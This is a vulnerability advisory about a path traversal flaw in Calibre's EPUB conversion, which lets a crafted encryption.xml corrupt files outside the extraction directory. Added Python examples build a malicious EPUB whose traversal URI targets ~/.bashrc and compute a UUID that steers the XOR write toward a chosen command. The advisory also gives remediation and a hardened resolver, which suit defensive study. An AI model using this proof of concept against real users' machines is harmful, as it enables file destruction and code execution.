Calibre Path Traversal Vulnerability in EPUB Conversion Leading to Arbitrary File Corruption and Code Execution

Vulnerability

A path traversal vulnerability has been identified in Calibre's EPUB conversion process that allows a malicious EPUB file to corrupt arbitrary existing files writable by the Calibre process. The issue affects Calibre versions through 9.1.0. During conversion, Calibre resolves the `CipherReference` URIs found in the EPUB's encryption metadata (`META-INF/encryption.xml`) to absolute filesystem paths without checking that the result stays inside the directory the book was extracted to, and then opens those paths in read-write mode. A URI whose `..` segments climb out of the container therefore selects a file outside the extraction directory, and the conversion modifies that file in place. The vulnerability has been confirmed on Calibre 9.1.0 on both Windows 11 (x64) and Linux.

Impact

Exploitation corrupts any existing file that is writable by the Calibre process and lies outside the conversion's extraction directory. The write is Calibre's font de-obfuscation step applied to the referenced path: approximately the first 1 KB of the targeted file is XORed with a key derived from the UUID of the EPUB book, which can destroy data or make the application that owns the file malfunction. Because XOR is invertible and the attacker controls the UUID, the corruption can be steered rather than merely inflicted: for a target whose leading bytes are predictable, such as a shell profile with default contents, the UUID can be chosen so that the XOR produces attacker-selected bytes, turning file corruption into arbitrary code execution the next time the profile is sourced.
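The following is an added example, not code from the advisory or from Calibre, modelling the XOR write described above and why it can be steered. It assumes the key is the 16 raw bytes of the book UUID, repeated, applied to the first 1024 bytes of the target (the Adobe font-obfuscation scheme); the advisory itself only says "approximately 1KB". The sample profile contents, the `PAYLOAD_BLOCK` marker and the helper names are constructed for the demonstration.

```python
"""
Added example (not from the advisory or Calibre's code base): a model of the
XOR write and of choosing the UUID so that known leading bytes become chosen
bytes. Assumption: 16-byte UUID key, cycled over the first 1024 bytes.
"""
import uuid
from itertools import cycle

OBFUSCATION_LEN = 1024  # assumed: Adobe scheme XORs only this many leading bytes


def xor_prefix(data: bytes, key: bytes, length: int = OBFUSCATION_LEN) -> bytes:
    """Model of the de-obfuscation write: XOR the first `length` bytes with the cycling key."""
    head = bytes(b ^ k for b, k in zip(data[:length], cycle(key)))
    return head + data[length:]


def uuid_for_payload(known_prefix: bytes, payload_block: bytes) -> str:
    """Pick the UUID whose raw bytes turn the known first 16 bytes into `payload_block`.

    XOR is invertible, so key = known XOR wanted. Any 16 bytes form a valid
    UUID string, so the result can be written into dc:identifier as urn:uuid:...
    """
    if len(payload_block) != 16 or len(known_prefix) < 16:
        raise ValueError("need a 16-byte payload block and at least 16 known bytes")
    key = bytes(p ^ k for p, k in zip(payload_block, known_prefix[:16]))
    return str(uuid.UUID(bytes=key))


def corrupt_with_uuid(target: bytes, uuid_str: str) -> bytes:
    """Apply the modelled write with the key derived from `urn:uuid:<uuid_str>`."""
    return xor_prefix(target, uuid.UUID(uuid_str).bytes)


# Constructed sample: a shell profile whose opening bytes are predictable.
SAMPLE_PROFILE = (b"# ~/.bashrc: executed by bash(1) for non-login shells.\n"
                  + b"# see /usr/share/doc/bash/examples/startup-files\n" * 30)

# Benign 16-byte marker line (command, padding, newline); an attacker would place a real command here.
PAYLOAD_BLOCK = b"echo hit".ljust(15) + b"\n"


def demo() -> dict:
    """Steer the first 16 bytes, then report what happens to the rest of the file."""
    chosen = uuid_for_payload(SAMPLE_PROFILE, PAYLOAD_BLOCK)
    damaged = corrupt_with_uuid(SAMPLE_PROFILE, chosen)
    return {
        "uuid": chosen,
        "first_line": damaged.split(b"\n", 1)[0],
        # Bytes 16..1024 are XORed with the same key and become garbage.
        "scrambled_tail": damaged[16:OBFUSCATION_LEN] != SAMPLE_PROFILE[16:OBFUSCATION_LEN],
        # Everything past the XORed prefix is left untouched.
        "untouched_rest": damaged[OBFUSCATION_LEN:] == SAMPLE_PROFILE[OBFUSCATION_LEN:],
        # XOR is an involution: a second pass with the same key restores the file.
        "involution": corrupt_with_uuid(damaged, chosen) == SAMPLE_PROFILE,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

Only the first 16-byte block can be steered, since the same key repeats across the rest of the prefix; the payload therefore has to be self-contained in that block and end with a newline so that the scrambled bytes that follow fall on later lines.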

Reproduction

To reproduce this vulnerability, create an EPUB whose `META-INF/encryption.xml` declares a `CipherReference` with a URI that uses `..` segments to point at an existing, writable file outside the EPUB extraction directory, and whose OPF carries a `urn:uuid:` identifier (the value from which the XOR key is derived). Convert the file with Calibre's GUI or with the `ebook-convert` command-line tool. The targeted file is modified in place; compare its contents before and after the conversion to confirm the corruption.
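As an added example serving both the vulnerability description and the reproduction steps above (not code from the advisory or from Calibre), the block below builds in memory a minimal EPUB whose `META-INF/encryption.xml` carries a path-traversing `CipherReference`, parses that URI back out the way a converter would, and contrasts a naive join onto the extraction directory (the behaviour the advisory describes) with a containment check that rejects the escape. The resolution functions are models of that behaviour, not Calibre's source; `SAMPLE_UUID`, `TRAVERSAL_URI` and `EXTRACT_DIR` are constructed values. The algorithm identifier is the standard Adobe font-obfuscation URI.

```python
"""
Added example (not from the advisory or Calibre): craft the EPUB layout the
advisory describes and model the flawed versus hardened URI resolution.
"""
import io
import os
import zipfile
from xml.etree import ElementTree as ET

CONTAINER_NS = "urn:oasis:names:tc:opendocument:xmlns:container"
XMLENC_NS = "http://www.w3.org/2001/04/xmlenc#"
ADOBE_OBFUSCATION = "http://ns.adobe.com/pdf/enc#RC"  # standard Adobe font-obfuscation algorithm URI

# Constructed sample values for the demonstration.
SAMPLE_UUID = "12345678-1234-5678-1234-567812345678"
TRAVERSAL_URI = "../../../../home/user/.bashrc"
EXTRACT_DIR = os.path.join(os.sep, "tmp", "calibre_conv_demo")


def build_epub(book_uuid: str, cipher_uri: str) -> bytes:
    """Return a minimal EPUB whose encryption.xml points its CipherReference at `cipher_uri`."""
    container_xml = f"""<?xml version="1.0"?>
<container version="1.0" xmlns="{CONTAINER_NS}">
  <rootfiles><rootfile full-path="content.opf" media-type="application/oebps-package+xml"/></rootfiles>
</container>"""
    # The urn:uuid identifier is the value the XOR key is derived from.
    opf = f"""<?xml version="1.0"?>
<package xmlns="http://www.idpf.org/2007/opf" version="2.0" unique-identifier="uid">
  <metadata xmlns:dc="http://purl.org/dc/elements/1.1/">
    <dc:identifier id="uid">urn:uuid:{book_uuid}</dc:identifier>
    <dc:title>demo</dc:title><dc:language>en</dc:language>
  </metadata>
  <manifest><item id="p" href="p.xhtml" media-type="application/xhtml+xml"/></manifest>
  <spine><itemref idref="p"/></spine>
</package>"""
    encryption_xml = f"""<?xml version="1.0"?>
<encryption xmlns="{CONTAINER_NS}">
  <EncryptedData xmlns="{XMLENC_NS}">
    <EncryptionMethod Algorithm="{ADOBE_OBFUSCATION}"/>
    <CipherData><CipherReference URI="{cipher_uri}"/></CipherData>
  </EncryptedData>
</encryption>"""
    page = "<html xmlns='http://www.w3.org/1999/xhtml'><body><p>demo</p></body></html>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        # OCF requires 'mimetype' to be the first entry and stored uncompressed.
        z.writestr("mimetype", "application/epub+zip", compress_type=zipfile.ZIP_STORED)
        for name, body in [("META-INF/container.xml", container_xml),
                           ("META-INF/encryption.xml", encryption_xml),
                           ("content.opf", opf), ("p.xhtml", page)]:
            z.writestr(name, body, compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def cipher_reference_uris(epub_bytes: bytes) -> list:
    """Read META-INF/encryption.xml out of the EPUB and list its CipherReference URIs."""
    with zipfile.ZipFile(io.BytesIO(epub_bytes)) as z:
        root = ET.fromstring(z.read("META-INF/encryption.xml"))
    return [cr.get("URI") for cr in root.iter(f"{{{XMLENC_NS}}}CipherReference")]


def naive_resolve(extract_dir: str, uri: str) -> str:
    """Model of the flawed step: join the URI onto the container root with no containment check."""
    meta_inf = os.path.join(extract_dir, "META-INF")
    return os.path.abspath(os.path.join(meta_inf, "..", *uri.split("/")))


def escapes(extract_dir: str, resolved: str) -> bool:
    """True if `resolved` lies outside `extract_dir` after symlink and '..' normalisation."""
    root = os.path.realpath(extract_dir)
    try:
        return os.path.commonpath([root, os.path.realpath(resolved)]) != root
    except ValueError:  # different drives on Windows: certainly outside
        return True


def safe_resolve(extract_dir: str, uri: str) -> str:
    """Hardened variant: resolve, then refuse any path that leaves the extraction directory."""
    candidate = naive_resolve(extract_dir, uri)
    if escapes(extract_dir, candidate):
        raise ValueError(f"CipherReference escapes the container: {uri!r}")
    return os.path.realpath(candidate)


if __name__ == "__main__":
    epub = build_epub(SAMPLE_UUID, TRAVERSAL_URI)
    for uri in cipher_reference_uris(epub):
        print("naive :", naive_resolve(EXTRACT_DIR, uri))
        try:
            print("safe  :", safe_resolve(EXTRACT_DIR, uri))
        except ValueError as e:
            print("safe  : rejected,", e)
```

The check in `safe_resolve` normalises both sides with `os.path.realpath` before comparing, so a `..` sequence or a symlink under the extraction directory cannot slip past a plain string-prefix comparison.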

Remediation

Update to Calibre version 9.2.0 or later, which fixes this vulnerability.

Added: Feb 6, 2026, 9:41 PM
Updated: Feb 6, 2026, 10:05 PM

Vulnerability Rating

Custom Algorithm

spread: 6.6
impact: 2.5
exploitability: 5.8
remediation: 7.7
relevance: 2.8
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.